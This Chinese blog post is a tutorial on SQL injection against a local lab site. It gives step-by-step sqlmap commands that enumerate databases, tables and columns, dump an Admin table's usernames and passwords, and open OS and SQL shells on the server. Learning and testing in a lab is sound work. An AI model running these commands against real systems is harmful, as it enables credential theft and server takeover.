Eswlnk Blog Eswlnk Blog
  • 资源
    • 精彩视频
    • 破解专区
      • WHMCS
      • WordPress主题
      • WordPress插件
    • 其他分享
    • 极惠VPS
    • PDF资源
  • 关于我
    • 论文阅读
    • 关于本站
    • 通知
    • 左邻右舍
    • 玩物志趣
    • 日志
    • 专题
  • 热议话题
    • 游戏资讯
  • 红黑
    • 渗透分析
    • 攻防对抗
    • 代码发布
  • 自主研发
    • 知识库
    • 插件
      • ToolBox
      • HotSpot AI 热点创作
    • 区块
    • 快乐屋
    • 卡密
  • 乱步
    • 文章榜单
    • 热门标签
  • 问答中心反馈
  • 注册
  • 登录
首页 › 攻防对抗 › 攻防实战:网站SQL注入攻击与猜解思路

攻防实战:网站SQL注入攻击与猜解思路

Eswlnk的头像
Eswlnk
2022-04-28 23:00:18
攻防实战:网站SQL注入攻击与猜解思路-Eswlnk Blog
智能摘要 AI
本文分享了一次在本地局域网内的SQL注入攻击实战,旨在帮助攻防爱好者提升技能。文中详细介绍了如何使用sqlmap工具检测和利用SQL注入漏洞,包括查找注入点、获取数据库信息、爆破数据表及字段、提取敏感数据等步骤。通过这些操作,攻击者能够获取数据库中的用户信息和其他重要数据。此外,还展示了更高级的操作,如创建与系统交互的shell窗口和SQL shell,以进一步探索和控制目标系统。本文强调所有实验均在合法授权的靶机环境中进行,提醒读者避免非法攻击行为。

还是那句老话,攻防无绝对,本次为攻防爱好者分享一篇Eswink在本地局域网内的一次攻击实战,包含了网站SQL注入与猜解思路。

攻防实战:网站SQL注入攻击与猜解思路-Eswlnk Blog

常见攻击手段

  • XSS攻击:利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序
  • CSRF攻击:跨站请求伪造,攻击者诱导受害者进入第三方网站,在第三方网站中,向被攻击网站发送跨站请求
  • DDOS攻击:通过大规模互联网流量淹没目标服务器或其周边基础设施,以破坏目标服务器、服务或网络正常流量的恶意行为
  • sql注入:将SQL代码添加到输入参数中,传递到服务器解析并执行的一种攻击手法

攻击工具

本篇只针对SQL注入攻击做实战演示,其他攻击手法以后博主有时间再写吧。所用工具:sqlmap,关于SQLMAP的介绍和安装我这里就不作更多的赘述了,自己百度下。

靶机搭建

想要寻找靶机这个多少碰点运气,因为现在开发人员对sql漏洞越来越重视,以及流行框架已经从底层给你规避了这种风险,已经很少网站存在sql注入漏洞了。但是,只要存在,这将是致命的。所以本次我在本地局域网搭建了靶机,并且搭建了含有注入点的网站。本篇内容仅供个人学习参考使用,恶意攻击是违法行为,本次实验均为局域网内部靶机。

实战开始

寻找注入点

输入以下代码,–dbs代表爆出该网站所有数据库,假如该链接存在sql注入漏洞,将会得到下图所示

python sqlmap.py -u "http://127.0.0.1/ShowSd.asp?Infoid=1333" --dbs
攻防实战:网站SQL注入攻击与猜解思路-Eswlnk Blog

该图给了我们如下信息:

操作系统:windows2019 or 2016 or 10

语言:asp,.net开发

数据库:sql server 2005

可用数据库:fireworknet、master、model、msdb、tempdb

寻找当前使用数据库

输入以下命令,寻找网站当前使用的数据库,这里就不贴图了,会返回 current database: ‘fireworknet’

python sqlmap.py -u "http://127.0.0.1/ShowSd.asp?Infoid=1333" --current-db

爆破数据表

通过上面的信息,我们已经找到网站所属数据库为:fireworknet,执行如下指令,爆出fireworknet数据库下所有表,将会得到下图所示:

python sqlmap.py -u "http://127.0.0.1/ShowSd.asp?Infoid=1333" -D fireworknet --tables
攻防实战:网站SQL注入攻击与猜解思路-Eswlnk Blog

通过上图信息我们可以知道fireworknet数据库下一共有31张表

爆破表字段

输入以下代码,爆破Admin表字段,将会得到下图所示

python sqlmap.py -u "http://127.0.0.1/ShowSd.asp?Infoid=1333" -D fireworknet -T Admin --columns
攻防实战:网站SQL注入攻击与猜解思路-Eswlnk Blog

通过上图信息我们可以了解到:fireworknet数据库下Admin表有8个字段

爆破表内容

输入以下代码,打印出Admin表,Admin_ID、Admin_Name、Admin_PWD字段,将会得到如下图所示。至此,从寻找sql漏洞到利用漏洞爆破数据库所有表数据完结……

python sqlmap.py -u "http://127.0.0.1/ShowSd.asp?Infoid=1333" -D fireworknet -T Admin -C Admin_ID,Admin_Name,Admin_PWD --dump
攻防实战:网站SQL注入攻击与猜解思路-Eswlnk Blog

进阶玩法

创建与系统交互的shell窗口

输入以下代码,将得到下图所示

python sqlmap.py -u "http://127.0.0.1/ShowSd.asp?Infoid=1333" --os-shell
攻防实战:网站SQL注入攻击与猜解思路-Eswlnk Blog

os-shell中比如输入ipconfig/all命令:(将会爆出服务器内网ip地址等信息)

攻防实战:网站SQL注入攻击与猜解思路-Eswlnk Blog

创建SQL shell

输入如下命令,在sql-shell中输入:select * from Extend,将会得到下图所示

python sqlmap.py -u "http://127.0.0.1/ShowSd.asp?Infoid=1333" --sql-shell
攻防实战:网站SQL注入攻击与猜解思路-Eswlnk Blog
本站默认网盘访问密码:1166
本站默认网盘访问密码:1166
sqlmapxss工具攻击攻防对抗注入
0
0
Eswlnk的头像
Eswlnk
一个有点倒霉的研究牲站长
赞赏
巧妙解决网站广告被屏蔽的问题|反屏蔽广告插件方法
上一篇
宝塔面板收集站点隐私信息
下一篇

评论 (0)

请登录以参与评论
现在登录
    发表评论

猜你喜欢

  • 「漏洞资讯」CVE-2025-12914:宝塔面板曝出注入漏洞
  • 「亲测有效」Google Gemini 学生优惠:解决身份验证和支付卡验证
  • 小工具开发之EdgeOne免费计划兑换工具
  • 今日热点:伪Clash软件下载陷阱曝光,附防范建议
  • 「攻防对抗」利用 fastjson 原生反序列化与动态代理突破安全限制
Eswlnk的头像

Eswlnk

一个有点倒霉的研究牲站长
1108
文章
319
评论
679
获赞

随便看看

Fiber | 使用 Fibers 以不同且隐蔽的方式运行内存代码
2023-06-14 22:08:23
逆向分析之破解和解压Python打包工具
2021-12-09 16:28:12
数据包加解密传输逆向分析
2023-02-03 14:59:01

文章目录

专题展示

WordPress53

工程实践37

热门标签

360 AI API CDN java linux Nginx PDF PHP python SEO Windows WordPress 云服务器 云服务器知识 代码 免费 安全 安卓 工具 开发日志 微信 微软 手机 插件 攻防 攻防对抗 教程 日志 渗透分析 源码 漏洞 电脑 破解 系统 编程 网站优化 网络 网络安全 脚本 苹果 谷歌 软件 运维 逆向
  • 首页
  • 知识库
  • 地图
Copyright © 2023-2025 Eswlnk Blog. Designed by XiaoWu.
本站CDN由 壹盾安全 提供高防CDN安全防护服务
蜀ICP备20002650号-10
页面生成用时 0.894 秒   |  SQL查询 43 次
本站勉强运行:
友情链接: Eswlnk Blog 网站渗透 倦意博客 特资啦!个人资源分享站 祭夜博客 iBAAO壹宝头条
  • WordPress142
  • 网络安全64
  • 漏洞52
  • 软件52
  • 安全48
现在登录
  • 资源
    • 精彩视频
    • 破解专区
      • WHMCS
      • WordPress主题
      • WordPress插件
    • 其他分享
    • 极惠VPS
    • PDF资源
  • 关于我
    • 论文阅读
    • 关于本站
    • 通知
    • 左邻右舍
    • 玩物志趣
    • 日志
    • 专题
  • 热议话题
    • 游戏资讯
  • 红黑
    • 渗透分析
    • 攻防对抗
    • 代码发布
  • 自主研发
    • 知识库
    • 插件
      • ToolBox
      • HotSpot AI 热点创作
    • 区块
    • 快乐屋
    • 卡密
  • 乱步
    • 文章榜单
    • 热门标签
  • 问答中心反馈